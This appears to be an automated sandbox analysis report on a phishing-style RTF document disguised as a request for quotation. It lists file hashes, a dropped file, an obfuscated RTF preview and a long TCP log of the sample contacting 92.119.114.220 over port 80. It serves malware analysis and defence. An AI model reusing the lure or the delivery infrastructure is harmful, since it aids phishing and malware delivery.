Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tj.m'j.m'j.m'.Q.'k.m'.4.'I.m'.4.'r.m'.4.'..m'j.l'..m'...'..m'M7.'k.m'M7.'k.m'M7.'k.m'Richj.m'................PE..L...E.._.................n........................@.......................................@..........................................P..x....................p..P.......................................@............................................text....m.......n.................. ..`.rdata...d.......f...r..............@..@.data....P.......4..................@....rsrc...x....P......................@..@.reloc.......p.......(..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Q RATED POWER 2000HP- OTHERSPECIFICATION.docx.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.022815476091201
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.doc
File size:	1323990
MD5:	44cce032ed68104da1f632d18dd16971
SHA1:	415e8f97c4ad9392ee905cef88b814f0fd4162a2
SHA256:	1f9d1bffe188b76bbd97cb2fd59ab47248b71fcede2f415ca29fcc0f1040bbee
SHA512:	61062853a8ce2c68953105d485d63ef809aa0b94c677d304f7633226e1415e427521ed6beba45fb76de999762656f30d289f2e4ea8dbb80b659812d50c0511b7
SSDEEP:	24576:gEirQ4yNrQb+SMe9Gt+qiiXT7vWultiCaEITcgKGlWxRDSH9a8Kf1MxZH4BtLyI8:m
File Content Preview:	{\rtf4459?:?`/.!_)-~@%:??_.+?95,2`6#:)>?>??.#\|+:?`~\|2~..6!30!](%%~;@???)=8@8%%>6.([([.?$./0.>5-:?50]?+5_..)?5:(64+3..=985.$?\|1(;1?\|_,>++._[48<_%@0>~/)#^^?.+,.;~1%6,%:8.[~>/^?82'7.*??>)<=.7!2,%';][5?.[?[-/.=.?^5\|+_>&68@\|.[>,.&?,&^!,(?.,0=&5_-^`%32?.`,[=$

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000C5Dh								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 20:37:14.764405966 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.816431999 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.816730976 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.817434072 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.869082928 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.870426893 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.870512009 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.870580912 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.870640993 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.870647907 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.870683908 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.870712042 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.870728016 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.870764017 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.870778084 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.870841980 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.870853901 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.870901108 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.870914936 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.870981932 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.870982885 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.871042967 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.871046066 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.871146917 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.881366968 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.922678947 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922713995 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922727108 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922739029 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922755957 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922772884 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922791004 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922807932 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922817945 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.922826052 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922836065 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.922838926 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.922848940 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922869921 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922878027 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.922888041 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922899008 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.922908068 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.922909021 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922928095 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922935963 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.922944069 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.922946930 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922966003 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922970057 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.922982931 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.922991037 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.922996998 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.923001051 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.923019886 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.923021078 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.923037052 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.923038006 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.923048973 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.923088074 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.924243927 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.974742889 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.974819899 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.974841118 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.974864006 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.974910021 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.974948883 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.974951029 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.974987984 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.974999905 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975027084 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975030899 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975054026 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975061893 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975100040 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975114107 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975122929 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975137949 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975159883 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975174904 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975215912 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975222111 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975227118 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975258112 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975275993 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975317001 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975336075 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975354910 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975368023 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975392103 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975393057 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975426912 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975462914 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975492954 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975498915 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975513935 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975539923 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975545883 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975586891 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975604057 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975625038 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975627899 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975661993 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975675106 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975699902 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975702047 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975735903 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975750923 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975773096 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975785017 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975810051 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975822926 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975852013 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975860119 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975899935 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975910902 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975934982 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.975935936 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975974083 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.975986958 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.976011992 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.976013899 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.976047993 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.976058960 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.976084948 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.976089954 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.976145029 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.976171970 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.976197004 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.976200104 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.976243973 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.976249933 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.976285934 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.976304054 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.976324081 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.976331949 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.976358891 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.976362944 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:14.976413965 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:14.976643085 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.027965069 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028008938 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028021097 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028036118 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028048992 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028060913 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028073072 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028088093 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028115988 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028135061 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028151989 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028163910 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028175116 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028187990 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028201103 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028223991 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.028431892 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.029716969 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.030114889 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030138016 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030150890 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030164003 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030183077 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030199051 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030215025 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030230999 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030251980 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030272007 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030289888 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030307055 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030323982 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030342102 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030360937 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030378103 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030400991 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030419111 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030433893 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030451059 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030467987 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030484915 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030502081 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030519009 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030539036 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030558109 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030574083 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030591011 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030607939 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030625105 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030641079 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030657053 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.030725956 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.030777931 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.031802893 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.080161095 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.080199957 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.080244064 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.080245972 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.080269098 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.080276966 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.080277920 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.080303907 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.080312014 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.080338001 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.080338955 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.080374002 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.081091881 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.081124067 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.081145048 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.081150055 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.081156015 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.081181049 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.081185102 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.081224918 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.081227064 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.081255913 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.081264973 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.081283092 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.081289053 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.081316948 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.081316948 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.081353903 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.081358910 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.081397057 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.082067013 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.082102060 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.082122087 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.082139015 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.082381964 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083229065 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083273888 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083298922 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083302975 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083318949 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083326101 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083342075 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083353996 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083365917 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083389044 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083389044 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083422899 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083434105 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083455086 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083456993 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083487988 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083498955 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083513975 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083519936 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083543062 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083556890 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083574057 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083580017 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083590031 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083601952 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083611012 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083630085 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083642006 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083659887 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083659887 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083693981 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083694935 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083723068 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083729029 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083751917 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083760977 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083781958 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083807945 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083811045 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083817005 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083843946 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083847046 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083878040 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083882093 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083904982 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083910942 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083939075 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083940983 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.083967924 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.083980083 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.084000111 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.084007025 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.084037066 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.084038019 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.084067106 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.084079027 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.084093094 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.084105015 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.084121943 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.084131002 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.084148884 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.084157944 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.084182978 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.084187984 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.084224939 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.085000038 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.132057905 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.132112980 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.132152081 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.132162094 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.132189989 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.132195950 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.132203102 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.132227898 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.132766962 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.132810116 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.132817984 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.132853031 CET	80	49165	92.119.114.220	192.168.2.22
